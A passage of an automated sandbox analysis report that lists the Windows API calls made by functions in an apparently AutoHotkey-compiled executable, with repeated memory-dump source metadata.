Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004267A9, Relevance: 9.2, APIs: 6, Instructions: 189time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040A58D
Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040A5A8
Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040ABD3

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425963, Relevance: 9.2, APIs: 6, Instructions: 188time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425E3A, Relevance: 9.2, APIs: 6, Instructions: 188time

APIs

Part of subcall function 00475400: GetForegroundWindow.USER32 ref: 00475427
Part of subcall function 00475400: IsWindowVisible.USER32(00000000), ref: 00475441
Part of subcall function 00475400: IsIconic.USER32(00000000), ref: 0047544C
Part of subcall function 00475400: ShowWindow.USER32(00000000,00000009), ref: 00475459

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042711D, Relevance: 9.2, APIs: 6, Instructions: 186time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00451D20: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
Part of subcall function 00451D20: GetFileAttributesA.KERNEL32(?), ref: 00451D65
Part of subcall function 00451D20: RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
Part of subcall function 00451D20: SHFileOperation.SHELL32 ref: 00451DE6

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427620, Relevance: 9.2, APIs: 6, Instructions: 186time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 0044F400: GetSystemMetrics.USER32(00000007), ref: 0044F419
Part of subcall function 0044F400: GetSystemMetrics.USER32(00000007), ref: 0044F427
Part of subcall function 0044F400: GetSystemMetrics.USER32(00000004), ref: 0044F42F
Part of subcall function 0044F400: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0044F440
Part of subcall function 0044F400: IsWindow.USER32(00000000), ref: 0044F47A
Part of subcall function 0044F400: DestroyWindow.USER32(00000000), ref: 0044F48A
Part of subcall function 0044F400: CreateWindowExA.USER32(00000008,AutoHotkey2,?,88C00000,?,?,00000000,?,000601DA,00000000,00400000,00000000), ref: 0044F4CA
Part of subcall function 0044F400: GetClientRect.USER32(00000000,?), ref: 0044F4D7
Part of subcall function 0044F400: CreateWindowExA.USER32(00000000,static,?,50000001,00000000,00000000,?,?,00000000,00000000,00400000,00000000), ref: 0044F518
Part of subcall function 0044F400: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044F534
Part of subcall function 0044F400: _strncpy.LIBCMT ref: 0044F552
Part of subcall function 0044F400: EnumFontFamiliesExA.GDI32 ref: 0044F579
Part of subcall function 0044F400: GetStockObject.GDI32(00000011), ref: 0044F5AC
Part of subcall function 0044F400: SelectObject.GDI32(00000000,00000000), ref: 0044F5B4
Part of subcall function 0044F400: GetTextFaceA.GDI32(00000000,00000040,?), ref: 0044F5C2
Part of subcall function 0044F400: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044F5CB
Part of subcall function 0044F400: DeleteDC.GDI32(00000000), ref: 0044F5D4
Part of subcall function 0044F400: CreateFontA.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0044F60F
Part of subcall function 0044F400: SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0044F620
Part of subcall function 0044F400: ShowWindow.USER32(00000000,00000004), ref: 0044F62F

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425C45, Relevance: 9.2, APIs: 6, Instructions: 186time

APIs

Part of subcall function 00437A80: GetForegroundWindow.USER32 ref: 00437AE7
Part of subcall function 00437A80: IsIconic.USER32(00000000), ref: 00437AF8
Part of subcall function 00437A80: GetWindowRect.USER32(?,?), ref: 00437B10
Part of subcall function 00437A80: ClientToScreen.USER32(?,?), ref: 00437B32
Part of subcall function 00437A80: GetSystemMetrics.USER32(00000031), ref: 00437BC8
Part of subcall function 00437A80: GetSystemMetrics.USER32(00000032), ref: 00437BD0
Part of subcall function 00437A80: __Stoull.NTSTC_LIBCMT ref: 00437C16
Part of subcall function 00437A80: __Stoull.NTSTC_LIBCMT ref: 00437C5D
Part of subcall function 00437A80: _strncpy.LIBCMT ref: 00437C7B
Part of subcall function 00437A80: GetDC.USER32(00000000), ref: 00437ECE
Part of subcall function 00437A80: DestroyCursor.USER32(00000000), ref: 00437EF0
Part of subcall function 00437A80: DeleteObject.GDI32(00000000), ref: 00437EFB
Part of subcall function 00437A80: GetIconInfo.USER32(00000000,?), ref: 00437F2E
Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00437F67
Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00437F75
Part of subcall function 00437A80: CreateCompatibleDC.GDI32(?), ref: 00437FCD
Part of subcall function 00437A80: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00437FE8
Part of subcall function 00437A80: SelectObject.GDI32(00000000,00000000), ref: 00437FFE
Part of subcall function 00437A80: BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00438029
Part of subcall function 00437A80: ReleaseDC.USER32(00000000,?), ref: 00438202
Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00438214
Part of subcall function 00437A80: SelectObject.GDI32(?,?), ref: 0043822C
Part of subcall function 00437A80: DeleteDC.GDI32(?), ref: 00438233
Part of subcall function 00437A80: DeleteObject.GDI32(?), ref: 00438242

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004257A6, Relevance: 9.2, APIs: 6, Instructions: 185time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425642, Relevance: 9.2, APIs: 6, Instructions: 184time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426213, Relevance: 9.2, APIs: 6, Instructions: 184time

APIs

Part of subcall function 0044F670: GetMenu.USER32(00000000), ref: 0044F6F0
Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F701
Part of subcall function 0044F670: GetMenuItemID.USER32(00000000,?), ref: 0044F787
Part of subcall function 0044F670: GetSubMenu.USER32(00000000,?), ref: 0044F796
Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F79F
Part of subcall function 0044F670: GetMenuStringA.USER32(00000000,00000000,?,000003FF,00000400), ref: 0044F7E5
Part of subcall function 0044F670: CompareStringA.KERNEL32(00000400,00000001,?,00000000,?,?), ref: 0044F800
Part of subcall function 0044F670: CompareStringA.KERNEL32(00000400,00000001,?,?,?,?), ref: 0044F85E
Part of subcall function 0044F670: GetMenuItemID.USER32(00000000,00000000), ref: 0044F889
Part of subcall function 0044F670: GetSubMenu.USER32(00000000,00000000), ref: 0044F898
Part of subcall function 0044F670: GetMenuItemCount.USER32(00000000), ref: 0044F8A1
Part of subcall function 0044F670: PostMessageA.USER32(?,00000111,?,00000000), ref: 0044F937

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
